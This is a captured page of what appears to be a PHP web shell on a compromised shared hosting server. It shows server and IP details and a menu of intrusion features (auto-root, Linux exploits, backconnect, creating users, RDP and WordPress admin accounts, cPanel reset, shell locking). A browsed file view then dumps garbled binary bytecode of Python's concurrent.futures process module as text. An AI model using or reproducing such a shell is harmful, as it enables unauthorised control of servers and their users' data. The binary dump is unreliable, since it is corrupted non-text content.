Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
lib64 /
python3.8 /
concurrent /
futures /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-38.opt-1.pyc
1.08
KB
-rw-r--r--
__init__.cpython-38.opt-2.pyc
1.01
KB
-rw-r--r--
__init__.cpython-38.pyc
1.08
KB
-rw-r--r--
_base.cpython-38.opt-1.pyc
21.43
KB
-rw-r--r--
_base.cpython-38.opt-2.pyc
13.83
KB
-rw-r--r--
_base.cpython-38.pyc
21.43
KB
-rw-r--r--
process.cpython-38.opt-1.pyc
19.8
KB
-rw-r--r--
process.cpython-38.opt-2.pyc
13.32
KB
-rw-r--r--
process.cpython-38.pyc
19.83
KB
-rw-r--r--
thread.cpython-38.opt-1.pyc
5.68
KB
-rw-r--r--
thread.cpython-38.opt-2.pyc
5.15
KB
-rw-r--r--
thread.cpython-38.pyc
5.68
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : process.cpython-38.opt-1.pyc
U e5dzn � @ s� d Z dZddlZddlZddlmZ ddlZddlmZ ddlZ ddl ZddlmZ ddl Z ddlZddlmZ ddlZddlZddlZe�� ZdaG d d � d �Zdd� Zd ZdZG dd� de�ZG dd� d�Zdd� ZG dd� de�Z G dd� de�Z!G dd� de�Z"G dd� de�Z#dd� Z$dd � Z%d1d!d"�Z&d#d$� Z'd%d&� Z(d'd(� Z)da*da+d)d*� Z,d+d,� Z-G d-d.� d.ej.�Z/G d/d0� d0ej0�Z1e�2e� dS )2a- Implements ProcessPoolExecutor. The following diagram and text describe the data-flow through the system: |======================= In-process =====================|== Out-of-process ==| +----------+ +----------+ +--------+ +-----------+ +---------+ | | => | Work Ids | | | | Call Q | | Process | | | +----------+ | | +-----------+ | Pool | | | | ... | | | | ... | +---------+ | | | 6 | => | | => | 5, call() | => | | | | | 7 | | | | ... | | | | Process | | ... | | Local | +-----------+ | Process | | Pool | +----------+ | Worker | | #1..n | | Executor | | Thread | | | | | +----------- + | | +-----------+ | | | | <=> | Work Items | <=> | | <= | Result Q | <= | | | | +------------+ | | +-----------+ | | | | | 6: call() | | | | ... | | | | | | future | | | | 4, result | | | | | | ... | | | | 3, except | | | +----------+ +------------+ +--------+ +-----------+ +---------+ Executor.submit() called: - creates a uniquely numbered _WorkItem and adds it to the "Work Items" dict - adds the id of the _WorkItem to the "Work Ids" queue Local worker thread: - reads work ids from the "Work Ids" queue and looks up the corresponding WorkItem from the "Work Items" dict: if the work item has been cancelled then it is simply removed from the dict, otherwise it is repackaged as a _CallItem and put in the "Call Q". New _CallItems are put in the "Call Q" until "Call Q" is full. NOTE: the size of the "Call Q" is kept small because calls placed in the "Call Q" can no longer be cancelled with Future.cancel(). - reads _ResultItems from "Result Q", updates the future stored in the "Work Items" dict and deletes the dict entry Process #1..n: - reads _CallItems from "Call Q", executes the calls, and puts the resulting _ResultItems in "Result Q" z"Brian Quinlan (brian@sweetapp.com)� N)�_base)�Full)�Queue)�partialFc @ s, e Zd Zdd� Zdd� Zdd� Zdd� Zd S ) � _ThreadWakeupc C s t jdd�\| _| _d S )NF)Zduplex)�mpZPipe�_reader�_writer��self� r �2/usr/lib64/python3.8/concurrent/futures/process.py�__init__R s z_ThreadWakeup.__init__c C s | j �� | j�� d S �N)r �closer r r r r r U s z_ThreadWakeup.closec C s | j �d� d S )N� )r Z send_bytesr r r r �wakeupY s z_ThreadWakeup.wakeupc C s | j �� r| j �� q d S r )r ZpollZ recv_bytesr r r r �clear\ s z_ThreadWakeup.clearN)�__name__� __module__�__qualname__r r r r r r r r r Q s r c C s@ da tt�� �} | D ]\}}|�� q| D ]\}}|�� q*d S �NT)�_global_shutdown�list�_threads_wakeups�itemsr �join)r �_� thread_wakeup�tr r r �_python_exita s r � �= c @ s e Zd Zdd� Zdd� ZdS )�_RemoteTracebackc C s || _ d S r ��tb)r r% r r r r z s z_RemoteTraceback.__init__c C s | j S r r$ r r r r �__str__| s z_RemoteTraceback.__str__N)r r r r r&